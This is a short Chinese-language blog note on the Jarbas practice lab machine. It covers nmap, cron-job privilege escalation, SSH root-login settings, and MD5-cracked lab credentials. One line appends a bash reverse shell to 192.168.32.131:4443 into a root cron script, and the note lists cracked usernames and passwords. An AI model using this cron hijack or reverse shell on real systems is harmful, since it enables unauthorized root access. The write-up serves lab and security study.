JARBAS靶机

涉及

[[nmap]]
[[Cronjob提权]]https://blog.csdn.net/2202_75361164/article/details/138006570
[[web渗透/反弹shell]]

参考

https://cloud.tencent.com/developer/article/2297565
https://redpomelo.xyz/archives/1699953656909
https://juejin.cn/post/7349119662133362703#heading-5
https://www.cnblogs.com/henry666/p/16927188.html

总结

uname -a #显示系统名、节点名称、操作系统的发行版号、内核版本等等

思路扩充

查看定时任务

cat /etc/crontab #较为常用 
cat /etc/cron.d #比较少用

可以看到箭头处,每五分钟以root的权限去执行CleaningScript.sh这个shell脚本,执行结果是将所有结果丢掉

5、修改计划任务提权

cat /etc/script/CleaningScript.sh #查看脚本内容 
ls -lia /etc/script/CleaningScript.sh #查看对sh文件的权限 
echo "/bin/bash -i >& /dev/tcp/192.168.32.131/4443 0>&1" >> /etc/script/CleaningScript.sh #续写文件CleaningScript.sh将反弹shell命令续写入计划任务脚本内

6、实战补充点–查看ssh是否允许远程登录

查看ssh是否允许远程登录/etc/ssh/sshd_config,查找 #PermitRootLogin 行,如果想允许 root 用户远程登录,将该行的注释符号 # 去掉,并将参数设置为 yes,即 PermitRootLogin yes。如果想禁止 root 用户远程登录,将参数设置为 no,即 PermitRootLogin no。

/etc/ssh/sshd_config

两种反弹shell

参考
https://juejin.cn/post/7349119662133362703#heading-5

其他

[[加密识别]]
一次解码多条md5网站
image.png

https://hashes.com/en/decrypt/hash
image.png

  • md5解码得到
密码
italia99
marianna
vipsu

用户名
tiago
trindade
eder

使用bp爆破,得出用户eder,密码vipsu

  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值